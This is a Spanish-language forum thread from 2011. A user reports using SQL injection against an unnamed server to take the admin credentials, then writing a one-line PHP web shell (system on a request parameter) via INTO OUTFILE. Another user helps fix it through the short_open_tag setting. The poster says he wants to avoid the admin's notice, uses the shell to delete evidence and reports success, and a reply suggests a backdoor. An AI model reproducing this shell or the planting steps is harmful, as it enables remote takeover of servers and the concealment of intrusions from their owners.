Título: Shell php a medias Publicado por: 4rkn63l en 5 Marzo 2011, 18:35 pm Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell
Código: <? system($_REQUEST['cmd']); ?> Título: Re: Shell php a medias Publicado por: ~ Yoya ~ en 5 Marzo 2011, 20:49 pm Explicación de INTO OUTFILE en una Inyección SQL (http://yoyahack.blogspot.com/2010/10/explicacion-de-into-outfile-en-una.html)
Título: Re: Shell php a medias Publicado por: 4rkn63l en 5 Marzo 2011, 21:55 pm Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.
Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente. Título: Re: Shell php a medias Publicado por: ~ Yoya ~ en 5 Marzo 2011, 22:32 pm Eso se debe a la directiva short_open_tag, trata de subir el archivo de nuevo pero asi:
Código Título: Re: Shell php a medias Publicado por: 4rkn63l en 5 Marzo 2011, 22:55 pm si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.
Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no?? :xD Título: Re: Shell php a medias Publicado por: ~ Yoya ~ en 5 Marzo 2011, 22:57 pm si claro xD
Título: Re: Shell php a medias Publicado por: 4rkn63l en 6 Marzo 2011, 00:09 am Bingo!! ::)
Muchas gracias ~ Yoya ~ por tu ayuda,la verdad no pensé que el modo de las etiquetas pudiera afectar, leí una info donde efectivamente dice que en php5 no vienen habilitadas las etiquetas cortas que es lo que me hacias mencion anteriormente...pero bueno de los errores se aprende. Ademas pude borrar el primer archivo sin problemas jejeje. Título: Re: Shell php a medias Publicado por: not-all0w3d en 21 Marzo 2011, 22:18 pm ¿Por qué no sólo usaste una backdoor sencilla?..
En fin el problema está solucionado, sólo era una sugerencia. |